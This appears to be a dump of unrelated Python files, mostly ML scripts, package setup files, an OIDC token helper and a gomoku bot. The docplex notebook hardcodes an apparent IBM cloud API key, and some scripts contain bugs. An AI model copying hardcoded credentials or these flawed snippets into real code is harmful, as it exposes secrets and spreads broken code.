gpu_decoder_src = glob.glob(os.path.join(gpu_decoder_path, "*.cpp"))
cuda_libs = os.path.join(CUDA_HOME, "lib64")
cuda_inc = os.path.join(CUDA_HOME, "include")
ext_modules.append(
extension(
"torchvision.Decoder",
gpu_decoder_src,
include_dirs=include_dirs + [gpu_decoder_path] + [cuda_inc] + ffmpeg_include_dir,
library_dirs=ffmpeg_library_dir + library_dirs + [cuda_libs],
libraries=[
"avcodec",
"avformat",
"avutil",
"swresample",
"swscale",
"nvcuvid",
"cuda",
"cudart",
"z",
"pthread",
"dl",
"nppicc",
],
extra_compile_args=extra_compile_args,
)
)
else:
print("Building torchvision without video codec support")
if (
use_video_codec
and use_ffmpeg
and not any([os.path.exists(os.path.join(folder, "libavcodec", "bsf.h")) for folder in ffmpeg_include_dir])
):
print(
" The installed version of ffmpeg is missing the header file 'bsf.h' which is "
" required for GPU video decoding. Please install the latest ffmpeg from conda-forge channel:"
" `conda install -c conda-forge ffmpeg`."
)
return ext_modules
class clean(distutils.command.clean.clean):
def run(self):
with open(".gitignore") as f:
ignores = f.read()
for wildcard in filter(None, ignores.split("\n")):
for filename in glob.glob(wildcard):
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename, ignore_errors=True)
# It's an old-style class in Python 2.7...
distutils.command.clean.clean.run(self)
if __name__ == "__main__":
print(f"Building wheel {package_name}-{version}")
write_version_file()
with open("README.md") as f:
readme = f.read()
setup(
# Metadata
name=package_name,
version=version,
author="PyTorch Core Team",
author_email="soumith@pytorch.org",
url="https://github.com/pytorch/vision",
description="image and video datasets and models for torch deep learning",
long_description=readme,
long_description_content_type="text/markdown",
license="BSD",
# Package info
packages=find_packages(exclude=("test",)),
package_data={package_name: ["*.dll", "*.dylib", "*.so", "prototype/datasets/_builtin/*.categories"]},
zip_safe=False,
install_requires=requirements,
extras_require={
"scipy": ["scipy"],
},
ext_modules=get_extensions(),
python_requires=">=3.8",
cmdclass={
"build_ext": BuildExtension.with_options(no_python_abi_suffix=True),
"clean": clean,
},
)
|
import dash_bootstrap_components as dbc
from dash import html
toast = dbc.Toast(
[html.P("This is the content of the toast", className="mb-0")],
header="This is the header",
)
|
import torch.nn as nn
import torchvision.models as models
class EmbeddingNet(nn.Module):
def __init__(self, backbone=None):
super().__init__()
if backbone is None:
backbone = models.resnet50(num_classes=128)
self.backbone = backbone
def forward(self, x):
x = self.backbone(x)
x = nn.functional.normalize(x, dim=1)
return x
|
from datetime import timedelta
import time
import uuid
from Crypto.PublicKey.RSA import importKey
from django.utils import timezone
from jwkest.jwk import RSAKey as jwk_RSAKey
from jwkest.jwk import SYMKey
from jwkest.jws import JWS
from oidc_provider.lib.utils.common import get_issuer
from oidc_provider.models import (
Code,
RSAKey,
Token,
)
from oidc_provider import settings
def create_id_token(user, aud, nonce, at_hash=None, request=None):
"""
Receives a user object and aud (audience).
Then creates the id_token dictionary.
See: http://openid.net/specs/openid-connect-core-1_0.html#IDToken
Return a dic.
"""
sub = settings.get('OIDC_IDTOKEN_SUB_GENERATOR', import_str=True)(user=user)
expires_in = settings.get('OIDC_IDTOKEN_EXPIRE')
# Convert datetimes into timestamps.
now = timezone.now()
iat_time = int(time.mktime(now.timetuple()))
exp_time = int(time.mktime((now + timedelta(seconds=expires_in)).timetuple()))
user_auth_time = user.last_login or user.date_joined
auth_time = int(time.mktime(user_auth_time.timetuple()))
dic = {
'iss': get_issuer(request=request),
'sub': sub,
'aud': str(aud),
'exp': exp_time,
'iat': iat_time,
'auth_time': auth_time,
}
if nonce:
dic['nonce'] = str(nonce)
if at_hash:
dic['at_hash'] = at_hash
processing_hook = settings.get('OIDC_IDTOKEN_PROCESSING_HOOK')
if isinstance(processing_hook, (list, tuple)):
for hook in processing_hook:
dic = settings.import_from_str(hook)(dic, user=user)
else:
dic = settings.import_from_str(processing_hook)(dic, user=user)
return dic
def encode_id_token(payload, client):
"""
Represent the ID Token as a JSON Web Token (JWT).
Return a hash.
"""
alg = client.jwt_alg
if alg == 'RS256':
keys = []
for rsakey in RSAKey.objects.all():
keys.append(jwk_RSAKey(key=importKey(rsakey.key), kid=rsakey.kid))
if not keys:
raise Exception('You must add at least one RSA Key.')
elif alg == 'HS256':
keys = [SYMKey(key=client.client_secret, alg=alg)]
else:
raise Exception('Unsupported key algorithm.')
_jws = JWS(payload, alg=alg)
return _jws.sign_compact(keys)
def create_token(user, client, scope, id_token_dic=None):
"""
Create and populate a Token object.
Return a Token object.
"""
token = Token()
token.user = user
token.client = client
token.access_token = uuid.uuid4().hex
if id_token_dic is not None:
token.id_token = id_token_dic
token.refresh_token = uuid.uuid4().hex
token.expires_at = timezone.now() + timedelta(
seconds=settings.get('OIDC_TOKEN_EXPIRE'))
token.scope = scope
return token
def create_code(user, client, scope, nonce, is_authentication,
code_challenge=None, code_challenge_method=None):
"""
Create and populate a Code object.
Return a Code object.
"""
code = Code()
code.user = user
code.client = client
code.code = uuid.uuid4().hex
if code_challenge and code_challenge_method:
code.code_challenge = code_challenge
code.code_challenge_method = code_challenge_method
code.expires_at = timezone.now() + timedelta(
seconds=settings.get('OIDC_CODE_EXPIRE'))
code.scope = scope
code.nonce = nonce
code.is_authentication = is_authentication
return code
|
import io
from setuptools import find_packages
from setuptools import setup
with io.open("README.rst", "rt", encoding="utf8") as f:
readme = f.read()
setup(
name="Pallets-Sphinx-Themes",
version="1.1.3",
url="https://github.com/pallets/pallets-sphinx-themes/",
license="BSD-3-Clause",
author="Pallets",
author_email="contact@palletsprojects.com",
description="Sphinx themes for Pallets and related projects.",
long_description=readme,
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
zip_safe=False,
install_requires=["Sphinx", "packaging"],
entry_points={
"pygments.styles": [
"pocoo = pallets_sphinx_themes.themes.pocoo:PocooStyle",
"jinja = pallets_sphinx_themes.themes.jinja:JinjaStyle",
]
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Sphinx",
"Framework :: Sphinx :: Theme",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Documentation",
"Topic :: Documentation :: Sphinx",
"Topic :: Software Development :: Documentation",
],
)
|
#!/usr/bin/env python
# coding: utf-8
# In[11]:
import docplex.mp.model as cpx
import networkx as nx
import pandas as pd
import matplotlib.pyplot as plt
from math import sqrt
import networkx as nx
# In[12]:
t_n = 5
cij = [[0,55,105,80,60],[60,0,75,60,75],[110,90,0,195,135],[80,60,175,0,85],[60,75,120,80,0]]
cij
# In[13]:
opt_model = cpx.Model(name="MIP Model")
xij = opt_model.binary_var_matrix(t_n, t_n)
for i in range(t_n):
opt_model.add_constraint(xij[i,i] == 0)
for i in range(t_n):
# print(obj.number)
opt_model.add_constraint(opt_model.sum(xij[i,j] for j in range(t_n)) == 1)
for i in range(t_n):
# print(obj.number)
opt_model.add_constraint(opt_model.sum(xij[j,i] for j in range(t_n)) == 1)
# In[14]:
opt_model.minimize(opt_model.sum(xij[i,j]*cij[i][j] for i in range(t_n) for j in range(t_n)))
url = 'https://api-oaas.docloud.ibmcloud.com/job_manager/rest/v1/'
key = 'api_555476e8-b9e9-4d02-a523-cd50d8bbd4d5'
# In[15]:
for it in range(20):
s = opt_model.solve(url=url,key=key)
G = nx.DiGraph()
G.add_nodes_from(range(t_n))
for i in range(t_n):
for j in range(t_n):
if xij[i,j].solution_value == 1:
#print(i,j)
G.add_edge(i,j)
#if it >= 1:
#a = nx.find_cycle(G)
a_list = list(nx.simple_cycles(G))
if len(a_list) == 1:
break
for a_it in range(len(a_list)-1):
k = a_list[a_it]
print(k)
# nx.find_cycle(G)
#k = [a[i][0] for i in range(len(a))]
a_n = list(range(t_n))
for i in k:
a_n.remove(i)
opt_model.add_constraint(opt_model.sum(xij[k[i],j] for i in range(len(k)) for j in a_n) == 1)
####################################################################################################################
# In[19]:
from matplotlib.pyplot import figure
figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
# nx.draw(G,with_labels=True,pos=nx.circular_layout(G))
nx.draw(G,with_labels=True)
fig= plt.figure(figsize=(60,30))
plt.show()
# In[17]:
opt_model.print_solution()
print('Min path would be the objective')
# In[ ]:
|
def string_clean(s):
return ''.join(a for a in s if not a.isdigit())
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.jvm.resolve.jvm_tool import JvmToolBase
class ScroogeSubsystem(JvmToolBase):
options_scope = "scrooge"
help = "The Scrooge Thrift IDL compiler (https://twitter.github.io/scrooge/)."
default_version = "21.12.0"
default_artifacts = ("com.twitter:scrooge-generator_2.13:{version}",)
default_lockfile_resource = (
"pants.backend.codegen.thrift.scrooge",
"scrooge.default.lockfile.txt",
)
|
import numpy as np
from collections import Counter
from typing import Iterable, Union
def find_most_common(row: Iterable[str], mode: Union["elem", "count"]):
"""
Given iterable of words, return either most common element or its count
"""
if mode == "elem":
return Counter(row).most_common(1)[0][0]
elif mode == "count":
return Counter(row).most_common(1)[0][1]
def ue_variation_ratio(answers):
answers = [np.array(e, dtype=object) for e in answers]
answers = np.stack(answers, -1)
scores = 1.0 - np.array(
[find_most_common(ans, "count") / answers.shape[1] for ans in answers]
)
return scores
|
import csv, re
import numpy as np
from keras import Sequential
from keras.layers import Dense
# Age patterns
p1 = re.compile(r"0\.")
# Ticket patterns
p3 = re.compile(r"(\d*?)$")
def getAge(arg):
fract = p1.match(arg)
if arg == "":
return 32
elif arg[:2] == "0.":
return int(arg[fract.span()[1]:])
elif arg[-2:] == ".5":
return int(arg[:-2])
else:
return int(arg)
def getTicket(arg):
search = p3.search(arg)
ticket = arg[search.span()[0]:]
if ticket == "":
return 0
else:
return int(ticket)
def dataclean(inputarray):
#PassengerId,Survived,Pclass,Name,Sex,Age,SibSp,Parch,Ticket,Fare,Cabin,Embarked
output = []
v = 1
embarkedMapping = {"S":1, "Q":2, "C":3, "":1}
# skipping the first row
for row in inputarray:
if row[0] == "PassengerId":
pass
else:
if len(row) == 12:
v = 2
pclass = int(row[v].strip())
name = row[v+1].strip()
sex = 0 if row[v+2].strip() == "male" else 1
age = getAge(row[v+3].strip())
x = row[v+4].strip()
sibsp = int(x) if x in ['1', '0', '3', '4', '2', '5', '8'] else 0
x = row[v+5].strip()
parch = int(x) if x in ['0', '1', '2', '5', '3', '4', '6'] else 0
ticket = getTicket(row[v+6].strip())
fare = float(row[v+7].strip())
# Cabin - skip
cabin = row[v+8].strip()
embarked = embarkedMapping[row[v+9].strip()]
output += [[pclass, sex, age, sibsp, parch, fare, embarked]]
return output
def getlabels(arg):
labels = []
for row in arg:
if row[0] == "PassengerId":
pass
else:
labels += [int(row[1])]
return labels
with open("train.csv", mode='r') as f:
x = list(csv.reader(f))
x_train = dataclean(x)
y_train = getlabels(x)
x_test = np.array(x_train[-100:])
y_test = np.array(y_train[-100:])
x_train = np.array(x_train[:-100])
y_train = np.array(y_train[:-100])
model = Sequential()
model.add(Dense(7, input_shape=(7,)))
model.add(Dense(3))
model.add(Dense(1, activation="softmax"))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
history = model.fit(x_train, y_train, epochs=5)
score = model.evaluate(x_test, y_test)
print(score)
|
def isDigit(strng):
""" is_digit == PEP8 (forced mixedCase by Codewars) """
try:
float(strng)
return True
except ValueError:
return False
|
import os
from smqtk.utils.plugin import get_plugins
from ._interface_hash_index import HashIndex
__all__ = [
'HashIndex', 'get_hash_index_impls',
]
def get_hash_index_impls(reload_modules=False):
"""
Discover and return discovered ``HashIndex`` classes. Keys in the returned
map are the names of the discovered classes, and the paired values are the
actual class type objects.
We search for implementation classes in:
- modules next to this file this function is defined in (ones that
begin with an alphanumeric character),
- python modules listed in the environment variable
``HASH_INDEX_PATH``
- This variable should contain a sequence of python module
specifications, separated by the platform specific PATH
separator character (``;`` for Windows, ``:`` for unix)
Within a module we first look for a helper variable by the name
``HASH_INDEX_CLASS``, which can either be a single class object or
an iterable of class objects, to be specifically exported. If the variable
is set to None, we skip that module and do not import anything. If the
variable is not present, we look at attributes defined in that module for
classes that descend from the given base class type. If none of the above
are found, or if an exception occurs, the module is skipped.
:param reload_modules: Explicitly reload discovered modules from source.
:type reload_modules: bool
:return: Map of discovered class object of type ``HashIndex``
whose keys are the string names of the classes.
:rtype: dict[str, type]
"""
this_dir = os.path.abspath(os.path.dirname(__file__))
env_var = "HASH_INDEX_PATH"
helper_var = "HASH_INDEX_CLASS"
return get_plugins(__name__, this_dir, env_var, helper_var,
HashIndex, reload_modules=reload_modules)
|
import numpy as np
import tensorflow as tf
import os
import cv2
from tqdm.notebook import tqdm
tf2 = tf.compat.v2
# constants
KMNIST_IMG_SIZE = 28
KMNIST_TRAIN_IMAGE_COUNT = 60000
KMNIST_TEST_IMAGE_COUNT = 10000
PARALLEL_INPUT_CALLS = 16
def pre_process_train(ds):
X = np.empty((KMNIST_TRAIN_IMAGE_COUNT, KMNIST_IMG_SIZE, KMNIST_IMG_SIZE, 1))
y = np.empty((KMNIST_TRAIN_IMAGE_COUNT,))
for index, d in tqdm(enumerate(ds.batch(1))):
X[index, :, :] = d['image']
y[index] = d['label']
return X, y
def pre_process_test(ds):
X = np.empty((KMNIST_TEST_IMAGE_COUNT, KMNIST_IMG_SIZE, KMNIST_IMG_SIZE, 1))
y = np.empty((KMNIST_TEST_IMAGE_COUNT,))
for index, d in tqdm(enumerate(ds.batch(1))):
X[index, :, :] = d['image']
y[index] = d['label']
return X, y
|
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# hsv is Hue Sat Value
lower_range = np.array([0, 175,175]) # BGR
uppper_range = np.array([255, 255, 255])
mask = cv2.inRange(hsv, lower_range, uppper_range)
res = cv2.bitwise_and(frame, frame, mask=mask) # mask is work as boolean function
if cv2.waitKey(1) == 13:
break
# frame=cv2.flip(frame,1)
cv2.imshow("original", frame)
cv2.imshow("mask", mask)
cv2.imshow("res", res)
cap.release()
cv2.destroyAllWindows()
|
import sys
import os
f = open("C://Users/OZ/Documents/python/atcoder/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
import statistics
n = int(input())
a = list(map(int,input().split()))
b = []
for i in range(n):
b.append(a[i]-i)
bf = int(statistics.median(b))
ans = 0
for i in range(n):
ans += abs(a[i] - bf - i)
print(ans)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 2 12:54:26 2019
@author: juan
"""
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
import time
import os
import copy
import argparse
import torch.onnx
def imshow(inp, title=None):
"""Imshow for Tensor."""
inp = inp.numpy().transpose((1, 2, 0))
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
plt.imshow(inp)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
def visualize_sample(dataloaders, class_names):
inputs, classes = next(iter(dataloaders['train']))
# Make a grid from batch
out = torchvision.utils.make_grid(inputs)
imshow(out, title=[class_names[x] for x in classes])
def load_model(path, model, classes, percentage_frozen):
if model == "densenet":
model_conv = torchvision.models.densenet121(pretrained=False)
num_ftrs = model_conv.classifier.in_features
model_conv.classifier = nn.Linear(num_ftrs, classes)
elif model == "mobilenet":
model_conv = torchvision.models.mobilenet_v2(pretrained=False)
num_ftrs = model_conv.classifier[1].in_features
model_conv.classifier[1] = nn.Linear(num_ftrs, classes)
elif model == "squeezenet":
model_conv = torchvision.models.squeezenet1_0(pretrained=True)
num_channels = model_conv.classifier[1].in_channels
model_conv.classifier[1] = nn.Conv2d(num_channels, classes,
kernel_size=(1, 1),
stride=(1, 1))
elif model == "resnet":
model_conv = torchvision.models.resnet18(pretrained=False)
num_ftrs = model_conv.fc.in_features
model_conv.fc = nn.Linear(num_ftrs, classes)
total_param = round(percentage_frozen*len(list(model_conv.parameters())))
for param in list(model_conv.parameters())[:total_param]:
param.requires_grad = False
optimizer = optim.SGD(filter(lambda p: p.requires_grad,
model_conv.parameters()), lr=0.001,
momentum=0.9)
checkpoint = torch.load(path)
model_conv.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
model_conv.eval()
return model_conv
def save_model(epoch, model, optimizer, accuracy, loss, classes, path):
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'accuracy': accuracy,
'classes': classes
}, path)
def export_to_onnx(path, model, classes, percentage_frozen=0.9):
model_conv = load_model(path, model, classes, percentage_frozen)
batch_size = 4
x = torch.randn(batch_size, 3, 224, 224, requires_grad=True)
torch.onnx.export(model_conv,
x,
os.path.join("./saved_models/", str(model) + ".onnx"),
export_params=True,
opset_version=10,
do_constant_folding=True)
def load_data(data_dir):
data_transforms = {
'train': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'test': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),
data_transforms[x])
for x in ['train', 'val', 'test']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=4,
shuffle=True, num_workers=4)
for x in ['train', 'val', 'test']}
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val',
'test']}
class_names = image_datasets['train'].classes
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return dataloaders, dataset_sizes, class_names, device, image_datasets
def get_mean_and_std(dataset, devicy):
'''Compute the mean and std value of dataset.'''
dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,
shuffle=True, num_workers=2)
mean = torch.zeros(3)
std = torch.zeros(3)
print('==> Computing mean and std..')
for inputs, targets in tqdm(dataloader):
inputs.to(devicy)
targets.to(devicy)
for i in range(3):
mean[i] += inputs[:, i, :, :].mean()
std[i] += inputs[:, i, :, :].std()
mean.div_(len(dataset))
std.div_(len(dataset))
return mean, std
def evaluate_model(model, dataloaders, device):
since = time.time()
model = model.to(device)
model.eval()
running_corrects = 0
for inputs, labels in dataloaders['test']:
inputs = inputs.to(device)
labels = labels.to(device)
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
running_corrects += torch.sum(preds == labels.data)
epoch_acc = running_corrects.double() / dataset_sizes['test']
time_elapsed = time.time() - since
mean_inference_time = time_elapsed / dataset_sizes['test']
print('{} Inference time: {:.4f} Acc: {:.4f} NumParam: {}'.format(
'test', mean_inference_time, epoch_acc,
sum(p.numel() for p in model.parameters())))
def train_model(model, criterion, optimizer, scheduler, num_epochs,
dataloaders, device, dataset_sizes, classes, path):
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
if phase == 'train':
scheduler.step()
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(
phase, epoch_loss, epoch_acc))
# deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
save_model(epoch, model, optimizer, epoch_acc, epoch_loss,
classes, path)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
print('Best val Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model
def train(epochs, model, classes, percentage_frozen, device,
dataloaders, dataset_sizes, path):
if model == "densenet":
model_conv = torchvision.models.densenet121(pretrained=True)
num_ftrs = model_conv.classifier.in_features
model_conv.classifier = nn.Linear(num_ftrs, classes)
elif model == "mobilenet":
model_conv = torchvision.models.mobilenet_v2(pretrained=True)
num_ftrs = model_conv.classifier[1].in_features
model_conv.classifier[1] = nn.Linear(num_ftrs, classes)
elif model == "squeezenet":
model_conv = torchvision.models.squeezenet1_0(pretrained=True)
num_channels = model_conv.classifier[1].in_channels
model_conv.classifier[1] = nn.Conv2d(num_channels, classes,
kernel_size=(1, 1),
stride=(1, 1))
elif model == "resnet":
model_conv = torchvision.models.resnet18(pretrained=True)
num_ftrs = model_conv.fc.in_features
model_conv.fc = nn.Linear(num_ftrs, classes)
total_param = round(percentage_frozen*len(list(model_conv.parameters())))
for param in list(model_conv.parameters())[:total_param]:
param.requires_grad = False
model_conv = model_conv.to(device)
criterion = nn.CrossEntropyLoss()
# Observe that only parameters of final layer are being optimized as
# opposed to before.
# https://github.com/pytorch/pytorch/issues/679
optimizer_conv = optim.SGD(filter(lambda p: p.requires_grad,
model_conv.parameters()),
lr=0.001, momentum=0.9)
# Decay LR by a factor of 0.1 every 7 epochs
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=5,
gamma=0.1)
model_conv = train_model(model_conv, criterion, optimizer_conv,
exp_lr_scheduler, epochs,
dataloaders, device, dataset_sizes, classes, path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--pct_freeze",
help="the percentage of layers frozen",
type=float, default=0.9, dest="pctf")
parser.add_argument("--classf_net", help="classification network",
default="squeezenet", type=str, dest="clf")
parser.add_argument("--num_epochs", help="number of epochs",
default=5, type=int, dest="epochs")
parser.add_argument("--train", help="either train or test",
dest="train", type=int, default=0)
parsed = parser.parse_args()
dataloaders, dataset_sizes, class_names, device, datas = load_data(
"./images_app_detection/")
if parsed.train:
train(parsed.epochs, parsed.clf, len(class_names), parsed.pctf,
device,
dataloaders, dataset_sizes, "./saved_models/" +
parsed.clf + "_detection.tar")
else:
model = load_model("./saved_models/" +
parsed.clf + "_detection.tar",
parsed.clf,
len(class_names), parsed.pctf)
evaluate_model(model, dataloaders, device)
|
import statsmodels.api as sm
import numpy as np
# Parameters.
ar = np.array([.75, -.25])
ma = np.array([.65, .35])
ar = np.array([])
ma = np.array([])
# Simulate an ARMA process.
np.random.seed(42)
y = sm.tsa.arma_generate_sample(
ar=np.r_[1, ar],
ma=np.r_[1, ma],
nsample=10000,
sigma=1,
)
fig, ax = plt.subplots(1,1)
plt.plot(y)
plt.show()
# Fit ARMA process on the simulates to check coefficients, ACF and PACF.
# Plot ACF and PACF of estimated model.
sm.tsa.graphics.plot_acf(y, lags=20, zero=True);
sm.tsa.graphics.plot_pacf(y, lags=20, zero=True);
model = sm.tsa.ARMA(y, (1, 2)).fit(trend='c')
model.summary()
model.predict()
|
"""
样式美化:
"""
import matplotlib.pyplot as plt
import numpy as np
# 样式美化:
plt.style.use('ggplot')
# plt.style.use('fivethirtyeight')
# 第一个图像:
fig, ax = plt.subplots(ncols=2, nrows=2) # 生成4个子图
ax1, ax2, ax3, ax4 = ax.ravel() # 将4个子图分给这四个对象
x, y = np.random.normal(size=(2, 100))
ax1.plot(x, y, 'o')
# 第二个图像:
x = np.arange(10)
y = np.arange(10)
ncolors = len(plt.rcParams['axes.prop_cycle'])
shift = np.linspace(0, 10, ncolors)
for s in shift:
ax2.plot(x, y+s, '-')
# 第三个图像:
x = np.arange(5)
y1, y2, y3 = np.random.randint(1, 25, size=(3, 5))
width = 0.25
ax3.bar(x, y1, width)
ax3.bar(x+width, y2, width, color='g')
ax3.bar(x+2*width, y3, width, color='r')
# 图像4:
for i, color in enumerate(list('rbgykmrbgykm')):
x, y = np.random.normal(size=2)
ax4.add_patch(plt.Circle([x, y], 0.3, color=color))
ax4.axis('equal')
plt.show()
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext as _
from rest_framework import serializers, viewsets, exceptions
from app.courses.models import Course
from app.choosing.models import ResolvedCombination
class TeacherViewObject(object):
def __init__(self, id, name):
self.id = id
self.name = name
class TeacherViewSerializer(serializers.Serializer):
id = serializers.IntegerField()
name = serializers.CharField()
class CourseTeachersSerializer(serializers.Serializer):
id = serializers.IntegerField()
acronym = serializers.CharField()
teachers = serializers.SerializerMethodField('_teachers_list')
def _teachers_list(self, instance):
# whoops... missing choosing, TODO
combs = ResolvedCombination.objects.filter(
course=instance.id
)
passed_teachers = list()
for c in combs.filter(accepted=True):
passed_teachers.append(c.teacher)
denied_teachers = list()
for c in combs.filter(accepted=False):
denied_teachers.append(c.teacher.id)
if len(passed_teachers) == 0:
passed_teachers = instance.teachers.exclude(id__in=denied_teachers)
teachers = []
for t in passed_teachers:
tv = TeacherViewObject(id=t.id, name=str(t))
tvs = TeacherViewSerializer(tv)
teachers.append ( tvs.data )
return teachers
class Meta:
model = Course
fields = ("id", "acronym", "teachers")
class CourseTeachersViewSet(viewsets.ModelViewSet):
queryset = Course.objects.all()
serializer_class = CourseTeachersSerializer
http_method_names = ['get', 'head', 'options']
views_to_register = (
(r'course-teachers', CourseTeachersViewSet),
)
|
import random
PATTERNS = [
(10000000000000000, 'xxxxx'),
(-1000000000000000, 'ooooo'),
(100000000000, ' xxxx '),
(-10000000000, ' oooo '),
(-10000000000, 'oxxxx '),
(-10000000000, ' xxxxo'),
(-100000000, 'xoooo '),
(-100000000, ' oooox'),
(1000000000, 'xx xx'),
(-100000000, 'oo oo'),
(-10000000, ' oo o'),
(-10000000, 'oo o '),
(-10000000, ' o oo'),
(-10000000, 'o oo '),
(1000, 'xooox'),
(1000, 'xooox'),
(10000, 'xooo'),
(10000, 'ooox'),
(-100000000, 'xx o'),
(-100000000, 'o xx'),
(1000000, ' xxx '),
(-1000000, ' ooo '),
(-100, ' o o '),
(10, ' xx '),
(-10, ' oo '),
(1, ' x ')
]
class Board:
SIZE = 15
def generate_rows(self):
rows = []
for i in range(self.SIZE):
row = []
for j in range(self.SIZE):
row.append(0)
rows.append(row)
return rows
def generate_diagonals(self):
diagonals = []
delka = 1
for i in range(self.SIZE):
diagonal = []
for j in range(delka):
diagonal.append(0)
diagonals.append(diagonal)
delka += 1
delka = 14
for i in range(self.SIZE - 1):
diagonal = []
for j in range(delka):
diagonal.append(0)
diagonals.append(diagonal)
delka -= 1
print(diagonals)
return diagonals
def __init__(self):
self.rows = self.generate_rows()
self.columns = self.generate_rows()
self.diagonals_descending = self.generate_diagonals()
self.diagonals_ascending = self.generate_diagonals()
print(self.diagonals_descending)
def row_to_string(self, row):
output = ''
for i in row:
if (i == 0):
output += ' '
if (i == 1):
output += 'x'
if (i == -1):
output += 'o'
return output
def evaluate_row(self, row):
string_row = self.row_to_string(row)
total_score = 0
for pattern in PATTERNS:
score, p = pattern
if p in string_row:
#print(f'found pattern {p} in {row}')
total_score += score
#total_score = total_score + score
return total_score
def evaluate_position(self):
total_score = 0
for row in self.rows:
total_score += self.evaluate_row(row)
for column in self.columns:
total_score += self.evaluate_row(column)
for asc in self.diagonals_ascending:
total_score += self.evaluate_row(asc)
for disc in self.diagonals_descending:
total_score += self.evaluate_row(disc)
return total_score
def new_turn(self, row, column, player):
self.rows[row][column] = player
self.columns[column][row] = player
ascending_diagonal_number = row + column
if (row + column < self.SIZE):
self.diagonals_ascending[ascending_diagonal_number][column] = player
else:
self.diagonals_ascending[ascending_diagonal_number][self.SIZE - 1 - row] = player
descending_diagonal_number = self.SIZE - 1 - row + column
if (descending_diagonal_number < 15):
self.diagonals_descending[descending_diagonal_number][column] = player
else:
self.diagonals_descending[descending_diagonal_number][row] = player
#self.print_all()
def get(self, row, col):
return self.rows[row][col]
def print_all(self):
print('rows')
for row in self.rows:
print(row)
print('cols')
for col in self.columns:
print(col)
print('desc')
for d in self.diagonals_descending:
print(d)
print('asc')
for d in self.diagonals_ascending:
print(d)
class Player:
def __init__(self, player_sign):
self.sign = 1
self.opponent_sign = -1
self.name = 'Patrik2'
self.board = Board()
random.seed(17)
"""
def pick_random_valid_turn(self):
while True:
row = random.randint(0, 14)
col = random.randint(0, 14)
if (self.board.get(row, col) == 0): return (row, col)
"""
def pick_best_turn(self):
best_score = (-float('inf'))
best_turn = None
for row in range(15):
for col in range(15):
if (self.board.get(row, col) != 0): continue
self.board.new_turn(row, col, self.sign)
score = self.board.evaluate_position()
if score > best_score:
best_turn = (row, col)
best_score = score
self.board.new_turn(row, col, 0)
return best_turn
def play(self, opponent_move):
if opponent_move != None:
row, col = opponent_move
self.board.new_turn(row, col, self.opponent_sign)
#my_turn_row, my_turn_col = self.pick_random_valid_turn()
my_turn_row, my_turn_col = self.pick_best_turn()
